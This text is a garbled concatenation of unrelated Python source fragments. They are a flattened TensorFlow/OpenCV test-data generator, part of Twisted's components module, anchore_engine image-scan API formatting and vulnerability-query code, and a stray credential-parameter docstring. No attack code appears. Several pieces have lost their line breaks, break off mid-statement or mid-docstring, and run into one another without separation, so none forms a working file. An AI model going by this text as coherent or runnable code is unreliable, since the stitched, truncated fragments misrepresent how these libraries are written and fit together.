detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] - 1 detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save(name + '.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv1 = tf.layers.conv2d(inp, filters=4, kernel_size=[1, 1]) conv2 = tf.layers.conv2d(inp, filters=4, kernel_size=[1, 1]) flatten1 = tf.contrib.layers.flatten(conv1) flatten2 = tf.contrib.layers.flatten(conv2) concat = tf.concat([flatten1, flatten2], axis=1) bias = tf.contrib.layers.bias_add(concat) # Add zeros (it has NHWC data format flag) save(inp, bias, 'concat_axis_1') ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 5, 8], 'input') # NCHW input conv = tf.layers.conv2d(inp, filters=4, kernel_size=[2, 3], data_format='channels_first') pool = tf.layers.max_pooling2d(conv, pool_size=2, strides=2, data_format='channels_first') save(inp, pool, 'conv_pool_nchw') # Input and output have been transposed (see writeBlob) for name in ['conv_pool_nchw_in.npy', 'conv_pool_nchw_out.npy']: np.save(name, np.load(name).transpose(0, 2, 3, 1)) ################################################################################ model = K.models.Sequential() model.add(K.layers.UpSampling2D(size=(3, 2), data_format='channels_last', name='keras_upsampling2d', input_shape=(2, 3, 4))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_upsampling2d_input:0'), sess.graph.get_tensor_by_name('keras_upsampling2d/ResizeNearestNeighbor:0'), 'keras_upsampling2d') ################################################################################ # Generate test data for MobileNet-SSD object detection model from TensorFlow # model zoo, 
http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_ppn_shared_box_predictor_300x300_coco14_sync_2018_07_03.tar.gz with tf.gfile.FastGFile('../ssd_mobilenet_v1_ppn_coco.pb') as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output img = cv.imread('../dog416.png') inp = cv.resize(img, (300, 300)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), # localSession.graph.get_tensor_by_name('detection_scores:0'), # localSession.graph.get_tensor_by_name('detection_boxes:0'), # localSession.graph.get_tensor_by_name('detection_classes:0')], # feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save('ssd_mobilenet_v1_ppn_coco.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3], 'input') flatten = tf.reshape(inp, [-1, 2*3], 'planar') reshaped = tf.reshape(flatten, tf.shape(inp), 'reshape') save(inp, reshaped, 'reshape_as_shape', optimize=False) ################################################################################ with tf.gfile.FastGFile('../mask_rcnn_inception_v2_coco_2018_01_28.pb') as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output 
img = cv.imread('../street.png') inp = cv.resize(img, (800, 800)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), localSession.graph.get_tensor_by_name('detection_scores:0'), localSession.graph.get_tensor_by_name('detection_boxes:0'), localSession.graph.get_tensor_by_name('detection_classes:0'), localSession.graph.get_tensor_by_name('detection_masks:0')], feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] - 1 detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save('mask_rcnn_inception_v2_coco_2018_01_28.detection_out.npy', detections) np.save('mask_rcnn_inception_v2_coco_2018_01_28.detection_masks.npy', out[4]) ################################################################################ inp = K.Input(shape=(2, 3, 4), name='keras_pad_concat_input', batch_size=1) conv = K.layers.Conv2D(filters=4, kernel_size=1, data_format='channels_last', name='keras_pad_concat_conv', input_shape=(2, 3, 4))(inp) def pad_depth(x, desired_channels): y = K.backend.random_uniform_variable(x.shape.as_list()[:-1] + [desired_channels], low=0, high=1) return K.layers.concatenate([x, y]) pad = K.layers.Lambda(pad_depth, arguments={'desired_channels': 5}, name='keras_pad_concat')(conv) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_pad_concat_input:0'), sess.graph.get_tensor_by_name('keras_pad_concat/concatenate/concat:0'), 'keras_pad_concat', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], 
bias_initializer=tf.random_normal_initializer()) sub = conv - inp save(inp, sub, 'eltwise_sub') ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[1, 1]) softmax = tf.contrib.slim.softmax(conv) save(inp, softmax, 'slim_softmax') ################################################################################ # issue https://github.com/opencv/opencv/issues/14224 inp_node = 'img_inputs' out_node = 'MobileFaceNet/MobileFaceNet/Conv2d_0/add' with tf.Session(graph=tf.Graph()) as localSession: localSession.graph.as_default() with tf.gfile.FastGFile('frozen_model.pb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) for node in graph_def.node: if node.name == inp_node: del node.attr['shape'] tf.import_graph_def(graph_def, name='') inputData = gen_data(tf.placeholder(tf.float32, [1, 4, 5, 3], inp_node)) outputData = localSession.run(localSession.graph.get_tensor_by_name(out_node + ':0'), feed_dict={inp_node + ':0': inputData}) writeBlob(inputData, 'slim_batch_norm_in') writeBlob(outputData, 'slim_batch_norm_out') graph_def = TransformGraph(graph_def, [inp_node], [out_node], ['fold_constants', 'strip_unused_nodes']) with tf.gfile.FastGFile('slim_batch_norm_net.pb', 'wb') as f: f.write(graph_def.SerializeToString()) ################################################################################ # issue
# -*- test-case-name: twisted.python.test.test_components -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Component architecture for Twisted, based on Zope3 components.

Using the Zope3 API directly is strongly recommended. Everything
you need is in the top-level of the zope.interface package, e.g.::

   from zope.interface import Interface, implementer

   class IFoo(Interface):
       pass

   @implementer(IFoo)
   class Foo:
       print(IFoo.implementedBy(Foo)) # True
       print(IFoo.providedBy(Foo())) # True

L{twisted.python.components.registerAdapter} from this module may be used to
add to Twisted's global adapter registry.

L{twisted.python.components.proxyForInterface} is a factory for classes
which allow access to only the parts of another class defined by a specified
interface.
"""

from __future__ import division, absolute_import, print_function

# zope3 imports
from zope.interface import interface, declarations
from zope.interface.adapter import AdapterRegistry

# twisted imports
from twisted.python.compat import NativeStringIO
from twisted.python import reflect

# Twisted's global adapter registry
globalRegistry = AdapterRegistry()

# Attribute that registerAdapter looks at. Is this supposed to be public?
# When falsy, registering a second adapter for the same pair raises ValueError.
ALLOW_DUPLICATES = 0

# Define a function to find the registered adapter factory, using either a
# version of Zope Interface which has the `registered' method or an older
# version which does not.
if getattr(AdapterRegistry, 'registered', None) is None:
    def _registered(registry, required, provided):
        """
        Return the adapter factory for the given parameters in the given
        registry, or None if there is not one.
        """
        return registry.get(required).selfImplied.get(provided, {}).get('')
else:
    def _registered(registry, required, provided):
        """
        Return the adapter factory for the given parameters in the given
        registry, or None if there is not one.
        """
        return registry.registered([required], provided)


def registerAdapter(adapterFactory, origInterface, *interfaceClasses):
    """Register an adapter class.

    An adapter class is expected to implement the given interface, by
    adapting instances implementing 'origInterface'. An adapter class's
    __init__ method should accept one parameter, an instance implementing
    'origInterface'.
    """
    self = globalRegistry
    assert interfaceClasses, "You need to pass an Interface"
    global ALLOW_DUPLICATES

    # deal with class->interface adapters:
    if not isinstance(origInterface, interface.InterfaceClass):
        origInterface = declarations.implementedBy(origInterface)

    # First pass: refuse duplicates (unless ALLOW_DUPLICATES); second pass:
    # actually register, so a partial registration never occurs.
    for interfaceClass in interfaceClasses:
        factory = _registered(self, origInterface, interfaceClass)
        if factory is not None and not ALLOW_DUPLICATES:
            raise ValueError("an adapter (%s) was already registered." % (factory, ))
    for interfaceClass in interfaceClasses:
        self.register([origInterface], interfaceClass, '', adapterFactory)


def getAdapterFactory(fromInterface, toInterface, default):
    """Return registered adapter for a given class and interface.

    Note that is tied to the *Twisted* global registry, and will
    thus not find adapters registered elsewhere.
    """
    self = globalRegistry
    if not isinstance(fromInterface, interface.InterfaceClass):
        fromInterface = declarations.implementedBy(fromInterface)
    factory = self.lookup1(fromInterface, toInterface)
    if factory is None:
        factory = default
    return factory


def _addHook(registry):
    """
    Add an adapter hook which will attempt to look up adapters in the given
    registry.

    @type registry: L{zope.interface.adapter.AdapterRegistry}

    @return: The hook which was added, for later use with L{_removeHook}.
    """
    lookup = registry.lookup1
    def _hook(iface, ob):
        factory = lookup(declarations.providedBy(ob), iface)
        if factory is None:
            return None
        else:
            return factory(ob)
    interface.adapter_hooks.append(_hook)
    return _hook


def _removeHook(hook):
    """
    Remove a previously added adapter hook.

    @param hook: An object previously returned by a call to L{_addHook}.
        This will be removed from the list of adapter hooks.
    """
    interface.adapter_hooks.remove(hook)

# add global adapter lookup hook for our newly created registry
_addHook(globalRegistry)


def getRegistry():
    """Returns the Twisted global
    C{zope.interface.adapter.AdapterRegistry} instance.
    """
    return globalRegistry

# FIXME: deprecate attribute somehow?
CannotAdapt = TypeError


class Adapter:
    """I am the default implementation of an Adapter for some interface.

    This docstring contains a limerick, by popular demand::

        Subclassing made Zope and TR
        much harder to work with by far.
            So before you inherit,
            be sure to declare it
        Adapter, not PyObject*

    @cvar temporaryAdapter: If this is True, the adapter will not be
          persisted on the Componentized.
    @cvar multiComponent: If this adapter is persistent, should it be
          automatically registered for all appropriate interfaces.
    """

    # These attributes are used with Componentized.
    temporaryAdapter = 0
    multiComponent = 1

    def __init__(self, original):
        """Set my 'original' attribute to be the object I am adapting.
        """
        self.original = original

    def __conform__(self, interface):
        """
        I forward __conform__ to self.original if it has it, otherwise I
        simply return None.
        """
        if hasattr(self.original, "__conform__"):
            return self.original.__conform__(interface)
        return None

    def isuper(self, iface, adapter):
        """
        Forward isuper to self.original
        """
        return self.original.isuper(iface, adapter)


class Componentized:
    """I am a mixin to allow you to be adapted in various ways persistently.

    I define a list of persistent adapters.  This is to allow adapter classes
    to store system-specific state, and initialized on demand.  The
    getComponent method implements this.  You must also register adapters for
    this class for the interfaces that you wish to pass to getComponent.

    Many other classes and utilities listed here are present in Zope3; this
    one is specific to Twisted.
    """

    persistenceVersion = 1

    def __init__(self):
        # Maps qualified interface names to their cached adapter instances.
        self._adapterCache = {}

    def locateAdapterClass(self, klass, interfaceClass, default):
        return getAdapterFactory(klass, interfaceClass, default)

    def setAdapter(self, interfaceClass, adapterClass):
        """
        Cache a provider for the given interface, by adapting C{self} using
        the given adapter class.
        """
        self.setComponent(interfaceClass, adapterClass(self))

    def addAdapter(self, adapterClass, ignoreClass=0):
        """Utility method that calls addComponent.  I take an adapter class and
        instantiate it with myself as the first argument.

        @return: The adapter instantiated.
        """
        adapt = adapterClass(self)
        self.addComponent(adapt, ignoreClass)
        return adapt

    def setComponent(self, interfaceClass, component):
        """
        Cache a provider of the given interface.
        """
        self._adapterCache[reflect.qual(interfaceClass)] = component

    def addComponent(self, component, ignoreClass=0):
        """
        Add a component to me, for all appropriate interfaces.

        In order to determine which interfaces are appropriate, the component's
        provided interfaces will be scanned.

        If the argument 'ignoreClass' is True, then all interfaces are
        considered appropriate.

        Otherwise, an 'appropriate' interface is one for which its class has
        been registered as an adapter for my class according to the rules of
        getComponent.

        @return: the list of appropriate interfaces
        """
        for iface in declarations.providedBy(component):
            if (ignoreClass or
                (self.locateAdapterClass(self.__class__, iface, None)
                 == component.__class__)):
                self._adapterCache[reflect.qual(iface)] = component

    def unsetComponent(self, interfaceClass):
        """Remove my component specified by the given interface class."""
        del self._adapterCache[reflect.qual(interfaceClass)]

    def removeComponent(self, component):
        """
        Remove the given component from me entirely, for all interfaces for
        which it has been registered.

        @return: a list of the interfaces that were removed.
        """
        l = []
        # Iterate over a snapshot since entries are deleted during the loop.
        for k, v in list(self._adapterCache.items()):
            if v is component:
                del self._adapterCache[k]
                l.append(reflect.namedObject(k))
        return l

    def getComponent(self, interface, default=None):
        """Create or retrieve an adapter for the given interface.

        If such an adapter has already been created, retrieve it from the cache
        that this instance keeps of all its adapters.  Adapters created through
        this mechanism may safely store system-specific state.

        If you want to register an adapter that will be created through
        getComponent, but you don't require (or don't want) your adapter to be
        cached and kept alive for the lifetime of this Componentized object,
        set the attribute 'temporaryAdapter' to True on your adapter class.

        If you want to automatically register an adapter for all appropriate
        interfaces (with addComponent), set the attribute 'multiComponent' to
        True on your adapter class.
        """
        k = reflect.qual(interface)
        if k in self._adapterCache:
            return self._adapterCache[k]
        else:
            adapter = interface.__adapt__(self)
            if adapter is not None and not (
                hasattr(adapter, "temporaryAdapter") and
                adapter.temporaryAdapter):
                self._adapterCache[k] = adapter
                if (hasattr(adapter, "multiComponent") and
                    adapter.multiComponent):
                    self.addComponent(adapter)
            if adapter is None:
                return default
            return adapter

    def __conform__(self, interface):
        return self.getComponent(interface)


class ReprableComponentized(Componentized):
    def __init__(self):
        Componentized.__init__(self)

    def __repr__(self):
        from pprint import pprint
        sio = NativeStringIO()
        pprint(self._adapterCache, sio)
        return sio.getvalue()


def proxyForInterface(iface, originalAttribute='original'):
    """
    Create a class which proxies all method calls which adhere to an interface
    to another provider of that interface.

    This function is intended for creating specialized proxies. The typical way
    to use it is by subclassing the result::

      class MySpecializedProxy(proxyForInterface(IFoo)):
          def someInterfaceMethod(self, arg):
              if arg == 3:
                  return 3
              return self.original.someInterfaceMethod(arg)

    @param iface: The Interface to which the resulting object will conform, and
        which the wrapped object must provide.

    @param originalAttribute: name of the attribute used to save the original
        object in the resulting class. Default to C{original}.
    @type originalAttribute: C{str}

    @return: A class whose constructor takes the original object as its only
        argument. Constructing the class creates the proxy.
    """
    def __init__(self, original):
        setattr(self, originalAttribute, original)
    contents = {"__init__": __init__}
    for name in iface:
        contents[name] = _ProxyDescriptor(name, originalAttribute)
    proxy = type("(Proxy for %s)"
                 % (reflect.qual(iface),), (object,), contents)
    declarations.classImplements(proxy, iface)
    return proxy


class _ProxiedClassMethod(object):
    """
    A proxied class method.

    @ivar methodName: the name of the method which this should invoke when
import json
import stat
import datetime
import base64

from flask import request

from anchore_engine import utils
from anchore_engine.clients import catalog
import anchore_engine.services.common
from anchore_engine.subsys import taskstate, logger
import anchore_engine.configuration.localconfig
import anchore_engine.clients.policy_engine
import anchore_engine.subsys.metrics
from anchore_engine.subsys.metrics import flask_metrics


def make_response_content(content_type, content_data):
    """Normalize raw image-content data into the API response shape.

    Package-style content types ('os', 'npm', 'gem', 'python', 'java',
    'files') are flattened into a list of per-item dicts; 'docker_history',
    'manifest' and 'dockerfile' are returned base64-encoded; anything else
    is passed through unchanged.  Unknown or empty input yields [].
    """
    ret = []

    if content_type not in anchore_engine.services.common.image_content_types + anchore_engine.services.common.image_metadata_types:
        logger.warn("input content_type ("+str(content_type)+") not supported ("+str(anchore_engine.services.common.image_content_types)+")")
        return(ret)

    if not content_data:
        logger.warn("empty content data given to format - returning empty result")
        return(ret)

    # type-specific formatting of content data
    if content_type == 'os':
        elkeys = ['license', 'origin', 'size', 'type', 'version']
        for package in list(content_data.keys()):
            el = {}
            try:
                el['package'] = package
                for k in elkeys:
                    if k in content_data[package]:
                        el[k] = content_data[package][k]
                    else:
                        el[k] = None
            except:
                # NOTE(review): bare except deliberately skips malformed
                # entries rather than failing the whole response.
                el = {}
            if el:
                ret.append(el)
    elif content_type == 'npm':
        for package in list(content_data.keys()):
            el = {}
            try:
                el['package'] = content_data[package]['name']
                el['type'] = 'NPM'
                el['location'] = package
                el['version'] = content_data[package]['versions'][0]
                el['origin'] = ','.join(content_data[package]['origins']) or 'Unknown'
                el['license'] = ' '.join(content_data[package]['lics']) or 'Unknown'
            except:
                el = {}
            if el:
                ret.append(el)
    elif content_type == 'gem':
        for package in list(content_data.keys()):
            el = {}
            try:
                el['package'] = content_data[package]['name']
                el['type'] = 'GEM'
                el['location'] = package
                el['version'] = content_data[package]['versions'][0]
                el['origin'] = ','.join(content_data[package]['origins']) or 'Unknown'
                el['license'] = ' '.join(content_data[package]['lics']) or 'Unknown'
            except:
                el = {}
            if el:
                ret.append(el)
    elif content_type == 'python':
        for package in list(content_data.keys()):
            el = {}
            try:
                el['package'] = content_data[package]['name']
                el['type'] = 'PYTHON'
                el['location'] = content_data[package]['location']
                el['version'] = content_data[package]['version']
                el['origin'] = content_data[package]['origin'] or 'Unknown'
                el['license'] = content_data[package]['license'] or 'Unknown'
            except:
                el = {}
            if el:
                ret.append(el)
    elif content_type == 'java':
        for package in list(content_data.keys()):
            el = {}
            try:
                el['package'] = content_data[package]['name']
                el['type'] = content_data[package]['type'].upper()
                el['location'] = content_data[package]['location']
                el['specification-version'] = content_data[package]['specification-version']
                el['implementation-version'] = content_data[package]['implementation-version']
                el['maven-version'] = content_data[package]['maven-version']
                el['origin'] = content_data[package]['origin'] or 'Unknown'
            except:
                el = {}
            if el:
                ret.append(el)
    elif content_type == 'files':
        # Map internal field names to their API response names.
        elmap = {
            'linkdst': 'linkdest',
            'size': 'size',
            'mode': 'mode',
            'sha256': 'sha256',
            'type': 'type',
            'uid': 'uid',
            'gid': 'gid'
        }
        for filename in list(content_data.keys()):
            el = {}
            try:
                el['filename'] = filename
                for elkey in list(elmap.keys()):
                    try:
                        el[elmap[elkey]] = content_data[filename][elkey]
                    except:
                        el[elmap[elkey]] = None

                # special formatting
                #el['mode'] = oct(stat.S_IMODE(el['mode']))
                # Render permission bits as a 5-digit octal string.
                el['mode'] = format(stat.S_IMODE(el['mode']), '05o')
                if el['sha256'] == 'DIRECTORY_OR_OTHER':
                    el['sha256'] = None
            except Exception as err:
                el = {}
            if el:
                ret.append(el)
    elif content_type in ['docker_history']:
        # History is JSON-serialized, then base64-encoded as text.
        try:
            ret = utils.ensure_str(base64.encodebytes(utils.ensure_bytes(json.dumps(content_data))))
        except Exception as err:
            logger.warn("could not convert content to json/base64 encode - exception: {}".format(err))
            ret = ""
    elif content_type in ['manifest', 'dockerfile']:
        try:
            ret = utils.ensure_str(base64.encodebytes(utils.ensure_bytes(content_data)))
        except Exception as err:
            logger.warn("could not base64 encode content - exception: {}".format(err))
            ret = ""
    else:
        ret = content_data

    return(ret)


def make_response_vulnerability(vulnerability_type, vulnerability_data):
    """Flatten a policy-engine vulnerability report into a list of dicts.

    'os' reads the row/header style 'legacy_report'; 'non-os' reads the
    'cpe_report'; any other type passes the data through unchanged.  Every
    element starts from eltemplate so all keys are always present.
    """
    ret = []

    if not vulnerability_data:
        logger.warn("empty query data given to format - returning empty result")
        return (ret)

    # All fields default to the string 'None' (not Python None).
    eltemplate = {
        'vuln': 'None',
        'severity': 'None',
        'url': 'None',
        'fix': 'None',
        'package': 'None',
        'package_name': 'None',
        'package_version': 'None',
        'package_type': 'None',
        'package_cpe': 'None',
        'package_path': 'None',
        'feed': 'None',
        'feed_group': 'None',
    }

    if vulnerability_type == 'os':
        # response key -> legacy report column header
        keymap = {
            'vuln': 'CVE_ID',
            'severity': 'Severity',
            'package': 'Vulnerable_Package',
            'fix': 'Fix_Available',
            'url': 'URL',
            'package_type': 'Package_Type',
            'feed': 'Feed',
            'feed_group': 'Feed_Group',
            'package_name': 'Package_Name',
            'package_version': 'Package_Version',
        }
        scan_result = vulnerability_data['legacy_report']
        try:
            for imageId in list(scan_result.keys()):
                header = scan_result[imageId]['result']['header']
                rows = scan_result[imageId]['result']['rows']
                for row in rows:
                    el = {}
                    el.update(eltemplate)
                    for k in list(keymap.keys()):
                        try:
                            el[k] = row[header.index(keymap[k])]
                        except:
                            el[k] = 'None'

                        # conversions
                        if el[k] == 'N/A':
                            el[k] = 'None'
                    ret.append(el)
        except Exception as err:
            logger.warn("could not prepare query response - exception: " + str(err))
            ret = []
    elif vulnerability_type == 'non-os':
        # response key -> cpe report field
        keymap = {
            'vuln': 'vulnerability_id',
            'severity': 'severity',
            'package_name': 'name',
            'package_version': 'version',
            'package_path': 'pkg_path',
            'package_type': 'pkg_type',
            'package_cpe': 'cpe',
            'url': 'link',
            'feed': 'feed_name',
            'feed_group': 'feed_namespace',
        }
        scan_result = vulnerability_data['cpe_report']
        for vuln in scan_result:
            el = {}
            el.update(eltemplate)
            for k in list(keymap.keys()):
                el[k] = vuln[keymap[k]]
            el['package'] = "{}-{}".format(vuln['name'], vuln['version'])
            ret.append(el)
    else:
        ret = vulnerability_data

    return (ret)
def make_response_policyeval(user_auth, eval_record, params):
    """Format a catalog policy-evaluation record for the API response.

    Returns {tag: {...}} with 'policyId', 'status' ('pass' for GO/WARN,
    'fail' otherwise), 'last_evaluation' (UTC ISO8601 + 'Z'), and a
    'detail' dict that is only populated when params['detail'] is truthy.
    Raises Exception on any formatting failure.
    """
    ret = {}
    userId, pw = user_auth
    try:
        tag = eval_record['tag']
        ret[tag] = {}

        if eval_record['evalId'] and eval_record['policyId']:
            ret[tag]['detail'] = {}
            if params and 'detail' in params and params['detail']:
                # Fetch the full evaluation result and policy bundle documents.
                eval_data = catalog.get_document(user_auth, 'policy_evaluations', eval_record['evalId'])
                ret[tag]['detail']['result'] = eval_data
                bundle_data = catalog.get_document(user_auth, 'policy_bundles', eval_record['policyId'])
                ret[tag]['detail']['policy'] = bundle_data
            ret[tag]['policyId'] = eval_record['policyId']
            if eval_record['final_action'].upper() in ['GO', 'WARN']:
                ret[tag]['status'] = 'pass'
            else:
                ret[tag]['status'] = 'fail'
            ret[tag]['last_evaluation'] = datetime.datetime.utcfromtimestamp(eval_record['created_at']).isoformat() + 'Z'
        else:
            ret[tag]['policyId'] = "N/A"
            # NOTE(review): the success branch sets 'status', not
            # 'final_action' — confirm whether callers expect this key.
            ret[tag]['final_action'] = "fail"
            ret[tag]['last_evaluation'] = "N/A"
            ret[tag]['detail'] = {}
    except Exception as err:
        raise Exception("failed to format policy eval response: " + str(err))

    return (ret)


def make_response_image(user_auth, image_record, params=None):
    """Shape a catalog image record for the API response (mutates in place).

    Moves arch/distro/size/etc. under image_content.metadata, decodes the
    JSON annotations blob, synthesizes fulltag/fulldigest strings, converts
    epoch timestamps to ISO8601 'Z' strings and strips record_state_* keys.
    When params['detail'] is falsy the image_detail list is emptied.
    """
    # params defaults to None (was a shared mutable {} default);
    # all reads below treat None and {} identically.
    ret = image_record

    image_content = {'metadata': {}}
    for key in ['arch', 'distro', 'distro_version', 'dockerfile_mode', 'image_size', 'layer_count']:
        val = image_record.pop(key, None)
        image_content['metadata'][key] = val
    image_record['image_content'] = image_content

    if image_record['annotations']:
        try:
            annotation_data = json.loads(image_record['annotations'])
            image_record['annotations'] = annotation_data
        except:
            # Leave annotations as the raw string if it is not valid JSON.
            pass

    # try to assemble full strings
    if image_record and 'image_detail' in image_record:
        for image_detail in image_record['image_detail']:
            try:
                image_detail['fulldigest'] = image_detail['registry'] + "/" + image_detail['repo'] + "@" + image_detail['digest']
                image_detail['fulltag'] = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail['tag']
            except:
                image_detail['fulldigest'] = None
                image_detail['fulltag'] = None

            for removekey in ['record_state_val', 'record_state_key']:
                image_detail.pop(removekey, None)

            for datekey in ['last_updated', 'created_at', 'tag_detected_at']:
                try:
                    image_detail[datekey] = datetime.datetime.utcfromtimestamp(image_detail[datekey]).isoformat() + 'Z'
                except:
                    pass

    if params and 'detail' in params and not params['detail']:
        image_record['image_detail'] = []

    for datekey in ['last_updated', 'created_at', 'analyzed_at']:
        try:
            image_record[datekey] = datetime.datetime.utcfromtimestamp(image_record[datekey]).isoformat() + 'Z'
        except:
            pass
    for removekey in ['record_state_val', 'record_state_key']:
        image_record.pop(removekey, None)

    return (ret)


def impl_template(request_inputs):
    """Skeleton handler showing the standard (return_object, httpcode) shape.

    The locals are intentionally unused placeholders for copy-paste.
    """
    user_auth = request_inputs['auth']
    method = request_inputs['method']
    bodycontent = request_inputs['bodycontent']
    params = request_inputs['params']

    return_object = {}
    httpcode = 500
    try:
        pass
    except Exception as err:
        return_object = anchore_engine.services.common.make_response_error(err, in_httpcode=httpcode)
        httpcode = return_object['httpcode']

    return (return_object, httpcode)


def lookup_imageDigest_from_imageId(request_inputs, imageId):
    """Resolve an imageId to its imageDigest via the catalog.

    Returns None when the catalog has no record; re-raises catalog errors.
    """
    user_auth = request_inputs['auth']
    method = request_inputs['method']
    bodycontent = request_inputs['bodycontent']
    params = request_inputs['params']

    userId, pw = user_auth
    ret = None

    try:
        image_records = catalog.get_image(user_auth, imageId=imageId)
        if image_records:
            # First match wins; imageIds are expected to be unique per user.
            image_record = image_records[0]
            imageDigest = image_record['imageDigest']
            ret = imageDigest
    except Exception as err:
        logger.debug("operation exception: " + str(err))
        raise err

    return (ret)


def vulnerability_query(request_inputs, vulnerability_type, doformat=False):
    """Fetch vulnerabilities for the requested image(s) from the policy engine.

    Returns (return_object, httpcode): a dict keyed by imageDigest with
    either the raw policy-engine response or (when doformat) the output of
    make_response_vulnerability; 404 for unknown types or unanalyzed images.
    """
    user_auth = request_inputs['auth']
    method = request_inputs['method']
    bodycontent = request_inputs['bodycontent']
    params = request_inputs['params']

    return_object = {}
    httpcode = 500

    userId, pw = user_auth

    localconfig = anchore_engine.configuration.localconfig.get_config()
    system_user_auth = localconfig['system_user_auth']
    verify = localconfig['internal_ssl_verify']

    force_refresh = params.get('force_refresh', False)
    vendor_only = params.get('vendor_only', True)

    try:
        if vulnerability_type not in anchore_engine.services.common.image_vulnerability_types + ['all']:
            httpcode = 404
            raise Exception("content type ("+str(vulnerability_type)+") not available")

        tag = params.pop('tag', None)
        imageDigest = params.pop('imageDigest', None)
        digest = params.pop('digest', None)
        image_reports = catalog.get_image(user_auth, tag=tag, digest=digest, imageDigest=imageDigest)

        for image_report in image_reports:
            if image_report['analysis_status'] != taskstate.complete_state('analyze'):
                httpcode = 404
                raise Exception("image is not analyzed - analysis_status: " + image_report['analysis_status'])
            imageDigest = image_report['imageDigest']
            try:
                image_detail = image_report['image_detail'][0]
                imageId = image_detail['imageId']
                # FIX: was a redacted placeholder ('<PASSWORD>[1]'); the
                # password is the second element of the system user tuple.
                client = anchore_engine.clients.policy_engine.get_client(user=system_user_auth[0], password=system_user_auth[1], verify_ssl=verify)
                resp = client.get_image_vulnerabilities(user_id=userId, image_id=imageId, force_refresh=force_refresh, vendor_only=vendor_only)
                if doformat:
                    if vulnerability_type == 'all':
                        # Concatenate formatted results for every known type.
                        ret = []
                        for vtype in anchore_engine.services.common.image_vulnerability_types:
                            ret = ret + make_response_vulnerability(vtype, resp.to_dict())
                    else:
                        ret = make_response_vulnerability(vulnerability_type, resp.to_dict())
                    return_object[imageDigest] = ret
                else:
                    return_object[imageDigest] = resp.to_dict()
                httpcode = 200
            except Exception as err:
                httpcode = 500
                raise Exception("could not fetch vulnerabilities - exception: " + str(err))
        httpcode = 200
    except Exception as err:
        return_object = anchore_engine.services.common.make_response_error(err, in_httpcode=httpcode)
        httpcode = return_object['httpcode']

    return (return_object, httpcode)
(return_object, httpcode) def get_content(request_inputs, content_type, doformat=False): user_auth = request_inputs['auth'] method = request_inputs['method'] bodycontent = request_inputs['bodycontent'] params = request_inputs['params'] return_object = {} httpcode = 500 userId, pw = user_auth try: if content_type not in anchore_engine.services.common.image_content_types + anchore_engine.services.common.image_metadata_types: httpcode = 404 raise Exception("content type ("+str(content_type)+") not available") tag = params.pop('tag', None) imageDigest = params.pop('imageDigest', None) digest = params.pop('digest', None) image_reports = catalog.get_image(user_auth, tag=tag, digest=digest, imageDigest=imageDigest) for image_report in image_reports: if image_report['analysis_status'] != taskstate.complete_state('analyze'): httpcode = 404 raise Exception("image is not analyzed - analysis_status: " + image_report['analysis_status']) imageDigest = image_report['imageDigest'] if content_type == 'manifest': try: image_manifest_data = catalog.get_document(user_auth, 'manifest_data', imageDigest) except Exception as err: raise anchore_engine.services.common.make_anchore_exception(err, input_message="cannot fetch content data {} from archive".format(content_type), input_httpcode=500) image_content_data = { 'manifest': image_manifest_data } else: try: image_content_data = catalog.get_document(user_auth, 'image_content_data', imageDigest) except Exception as err: raise anchore_engine.services.common.make_anchore_exception(err, input_message="cannot fetch content data from archive", input_httpcode=500) # special handler for dockerfile contents from old method to new if content_type == 'dockerfile' and not image_content_data.get('dockerfile', None): try: if image_report.get('dockerfile_mode', None) ==
        version max:`` None
        | ``required:`` False | ``default:`` USER
        :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential.
        :type Origination: String

        | ``required:`` True | ``default:`` None
        :param PasswordSecure: The password portion of the credential.
        :type PasswordSecure: String

        | ``required:`` True | ``default:`` None
        :param Priority: The priority order in which to attempt this credential.
        :type Priority: String

        | ``required:`` False | ``default:`` ANY
        :param Protocol: The protocol for which to use this credential.
        :type Protocol: String

        | ``required:`` False | ``default:`` LOCAL
